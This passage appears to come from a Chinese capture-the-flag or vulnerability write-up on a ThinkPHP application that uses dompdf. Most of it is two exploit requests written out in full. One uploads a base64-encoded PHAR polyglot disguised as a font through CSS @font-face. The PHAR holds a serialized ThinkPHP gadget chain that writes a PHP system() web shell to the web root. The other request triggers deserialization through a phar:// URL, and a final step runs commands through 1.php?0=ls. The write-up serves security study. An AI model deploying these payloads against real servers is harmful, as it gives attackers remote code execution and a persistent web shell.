jE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjI6e3M6MTA6IgAqAGhhbmRsZXIiO086Mjc6InRoaW5rXGNhY2hlXGRyaXZlclxNZW1jYWNoZSI6Mzp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTowO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjA6IiI7czoxMzoiZGF0YV9jb21wcmVzcyI7YjowO31zOjEwOiIAKgBoYW5kbGVyIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjoyOntzOjY6IgAqAGdldCI7YToxOntzOjE4OiJIRVhFTlM8Z2V0QXR0cj5ubzwiO3M6NTQ6ImVjaG8gJzw%252FcGhwIHN5c3RlbSgpOyA%252FPicgPiAvdmFyL3d3dy9odG1sL3B1YmxpYy8xLnBocCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7fXM6NjoiACoAdGFnIjtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NDoiaG9zdCI7czo5OiIxMjcuMC4wLjEiO3M6NDoicG9ydCI7aToxMTIxMTtzOjY6ImV4cGlyZSI7aTozNjAwO3M6NzoidGltZW91dCI7aTowO3M6MTI6InNlc3Npb25fbmFtZSI7czo2OiJIRVhFTlMiO3M6ODoidXNlcm5hbWUiO3M6MDoiIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX19fX0IAAAAdGVzdC50eHQEAAAAthRJZAQAAAAMfn%252FYpAEAAAAAAAB0ZXN022l2ia1yjzHI4j9%252F%252FNeso0pc1gcCAAAAR0JNQg%253D%253D');
font-weight:'normal';
font-style:'normal';
}
</style>

====== REQUEST 2 NOT ENCODED =======

<style>
@font-face {
font-family:'exploit';
src:url('phar:///var/www/html/vendor/dompdf/dompdf/lib/fonts/exploit_normal_da94a27b825aeca64e86b19a3972972d.ttf##');
font-weight:'normal';
font-style:'normal';
}
</style>

将====== REQUEST 1 ENCODED =======先写入phar

1
<style>@font-face+{+font-family:'exploit';+src:url('data:text/plain;base64,UHJvZ3JhbSByb290OiAvdXNyCldhcm5pbmc6IEZvbnQgY29udGFpbmVkIG5vIGdseXBocwrvv73vv706Y3Z0ICF5Z2FzcO%252B%252Fve%252B%252FvWdseWY977%252B977%252B9PmFwCiAgICAgICAgICAgICAgICAgICAgICAgVGhlYWQhRe%252B%252Fve%252B%252Fve%252B%252FvTZoaGVhICRobXR477%252B9Ie%252B%252FvQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvY2EqbWF4cEc5OCBuYW1l77%252B9IylGYO%252B%252FvXBvc3Tvv73vv70yRCLvv712Tl8877%252B9CiAgICAgICAg77%252B977%252B9bkvvv73vv71uS%252B%252B%252FvSEq77%252B9Wu%252B%252Fve%252B%252FvUAu77%252B977%252B977%252B977%252B977%252B977%252B977%252B977%252B9MVBmRWTvv73vv73vv70g77%252B9OFrvv70gbCFNNOKWku%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvSF5KioqISrvv70u77%252B9Lzzvv73vv70y77%252B977%252B9PO%252B%252Fve%252B%252FvTLvv70vPO%252B%252Fve%252B%252FvTLvv73vv70877%252B977%252B9MjMhJzMjISAgICAgIO%252B%252Fve%252B%252Fve%252B%252Fve%252B%252Fve%252B%252FvWYhWO%252B%252FvQogICAgICAgIDVPJe%252B%252FvSAgICDvv70gICAgICAgKyAgICAgICAgICAgICAgICEgICAgICAgPyAgICAgICBKVyAgICAgIO%252B%252FvSAgICAgICDvv70gICBEVU1NWSBGT05URFVNTVkgRk9OVFVudGl0bGVkMVVudGl0bGVkMVJlZ3VsYXJSZWd1bGFyRm9udEZvcmdlIDIuMCA6IFVudGl0bGVkMSA6IDI2LTQtMjAyM0ZvbnRGb3JnZSAyLjAgOiBVbnRpdGxlZDEgOiAyNi00LTIwMjNVbnRpdGxlZDFVbnRpdGxlZDFWZXJzaW9uIDAwMS4wMDBWZXJzaW9uIDAwMS4wMDBVbnRpdGxlZDFVbnRpdGxlZDHvv73vv70y77%252B977%252B977%252B977%252B977%252B9de%252B%252FvW5L77%252B977%252B9bkvvv70KPD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8%252BDQpVCgAAAQAAABEAAAABAAAAAAAfCgAATzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NTp7czo5OiIAKgBhcHBlbmQiO2E6MTp7aTowO3M6ODoiZ2V0RXJyb3IiO31zOjg6IgAqAGVycm9yIjtPOjI3OiJ0aGlua1xtb2RlbFxyZWxhdGlvblxIYXNPbmUiOjM6e3M6MTU6IgAqAHNlbGZSZWxhdGlvbiI7YjowO3M6ODoiACoAcXVlcnkiO086MTQ6InRoaW5rXGRiXFF1ZXJ5IjoxOntzOjg6IgAqAG1vZGVsIjtPOjIwOiJ0aGlua1xjb25zb2xlXE91dHB1dCI6Mjp7czoyODoiAHRoaW5rXGNvbnNvbGVcT3V0cHV0AGhhbmRsZSI7TzozMDoidGhpbmtcc2Vzc2lvblxkcml2ZXJcTWVtY2FjaGVkIjoyOntzOjEwOiIAKgBoYW5kbGVyIjtPOjI3OiJ0aGlua1xjYWNoZVxkcml2ZXJcTWVtY2FjaGUiOjM6e3M6MTA6IgAqAG9wdGlvbnMiO2E6NTp7czo2OiJleHBpcmUiO2k6MDtzOjEyOiJjYWNoZV9zdWJkaXIiO2I6MDtzOjY6InByZWZpeCI7czowOiIiO3M6NDoicGF0aCI7czowOiIiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoiACoAaGFuZGxlciI7TzoxMzoidGhpbmtcUmVxdWVzdCI6Mjp7czo2OiIAKgBnZXQiO2E6MTp7czoxODoiSEVYRU5TPGdldEF0dHI%252Bbm88IjtzOjU0OiJlY2hvICc8P3BocCBzeXN0ZW0oKTsgPz4nID4gL3Zhci93d3cvaHRtbC9wdWJsaWMvMS5waHAiO31zOjk6IgAqAGZpbHRlciI7czo2OiJzeXN0ZW0iO31zOjY6IgAqAHRhZyI7YjoxO31zOjk6IgAqAGNvbmZpZyI7YTo3OntzOjQ6Imhvc3QiO3M6OToiMTI3LjAuMC4xIjtzOjQ6InBvcnQiO2k6MTEyMTE7czo2OiJleHBpcmUiO2k6MzYwMDtzOjc6InRpbWVvdXQiO2k6MDtzOjEyOiJzZXNzaW9uX25hbWUiO3M6NjoiSEVYRU5TIjtzOjg6InVzZXJuYW1lIjtzOjA6IiI7czo4OiJwYXNzd29yZCI7czowOiIiO319czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6Mjp7aTowO3M6Mjoibm8iO2k6MTtzOjM6IjEyMyI7fX1zOjk6IgAqAHBhcmVudCI7TzoyMDoidGhpbmtcY29uc29sZVxPdXRwdXQiOjI6e3M6Mjg6IgB0aGlua1xjb25zb2xlXE91dHB1dABoYW5kbGUiO086MzA6InRoaW5rXHNlc3Npb25cZHJpdmVyXE1lbWNhY2hlZCI6Mjp7czoxMDoiACoAaGFuZGxlciI7TzoyNzoidGhpbmtcY2FjaGVcZHJpdmVyXE1lbWNhY2hlIjozOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6MDoiIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6MTA6IgAqAGhhbmRsZXIiO086MTM6InRoaW5rXFJlcXVlc3QiOjI6e3M6NjoiACoAZ2V0IjthOjE6e3M6MTg6IkhFWEVOUzxnZXRBdHRyPm5vPCI7czo1NDoiZWNobyAnPD9waHAgc3lzdGVtKCk7ID8%252BJyA%252BIC92YXIvd3d3L2h0bWwvcHVibGljLzEucGhwIjt9czo5OiIAKgBmaWx0ZXIiO3M6Njoic3lzdGVtIjt9czo2OiIAKgB0YWciO2I6MTt9czo5OiIAKgBjb25maWciO2E6Nzp7czo0OiJob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo0OiJwb3J0IjtpOjExMjExO3M6NjoiZXhwaXJlIjtpOjM2MDA7czo3OiJ0aW1lb3V0IjtpOjA7czoxMjoic2Vzc2lvbl9uYW1lIjtzOjY6IkhFWEVOUyI7czo4OiJ1c2VybmFtZSI7czowOiIiO3M6ODoicGFzc3dvcmQiO3M6MDoiIjt9fXM6OToiACoAc3R5bGVzIjthOjE6e2k6MDtzOjc6ImdldEF0dHIiO319czoxNToiACoAc2VsZlJlbGF0aW9uIjtiOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjI6e3M6MTA6IgAqAGhhbmRsZXIiO086Mjc6InRoaW5rXGNhY2hlXGRyaXZlclxNZW1jYWNoZSI6Mzp7czoxMDoiACoAb3B0aW9ucyI7YTo1OntzOjY6ImV4cGlyZSI7aTowO3M6MTI6ImNhY2hlX3N1YmRpciI7YjowO3M6NjoicHJlZml4IjtzOjA6IiI7czo0OiJwYXRoIjtzOjA6IiI7czoxMzoiZGF0YV9jb21wcmVzcyI7YjowO31zOjEwOiIAKgBoYW5kbGVyIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjoyOntzOjY6IgAqAGdldCI7YToxOntzOjE4OiJIRVhFTlM8Z2V0QXR0cj5ubzwiO3M6NTQ6ImVjaG8gJzw%252FcGhwIHN5c3RlbSgpOyA%252FPicgPiAvdmFyL3d3dy9odG1sL3B1YmxpYy8xLnBocCI7fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7fXM6NjoiACoAdGFnIjtiOjE7fXM6OToiACoAY29uZmlnIjthOjc6e3M6NDoiaG9zdCI7czo5OiIxMjcuMC4wLjEiO3M6NDoicG9ydCI7aToxMTIxMTtzOjY6ImV4cGlyZSI7aTozNjAwO3M6NzoidGltZW91dCI7aTowO3M6MTI6InNlc3Npb25fbmFtZSI7czo2OiJIRVhFTlMiO3M6ODoidXNlcm5hbWUiO3M6MDoiIjtzOjg6InBhc3N3b3JkIjtzOjA6IiI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fX19fX0IAAAAdGVzdC50eHQEAAAAthRJZAQAAAAMfn%252FYpAEAAAAAAAB0ZXN022l2ia1yjzHI4j9%252F%252FNeso0pc1gcCAAAAR0JNQg%253D%253D');+font-weight:'normal';+font-style:'normal';}</style>

这里传content是因为审计源码的时候发现

image-20230426203507788

image-20230426203522154

image-20230426203609835

知道这些以后,就可以去尝试post参数了

image-20230426203735353

然后接着post第二个参数

触发phar

1
<style>@font-face+{+font-family:'exploit';+src:url('phar%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Fvendor%2Fdompdf%2Fdompdf%2Flib%2Ffonts%2Fexploit_normal_da94a27b825aeca64e86b19a3972972d.ttf%23%23');+font-weight:'normal';+font-style:'normal';}</style>

然后直接访问1.php?0=ls就行了

参考文章 think PHP pdf rce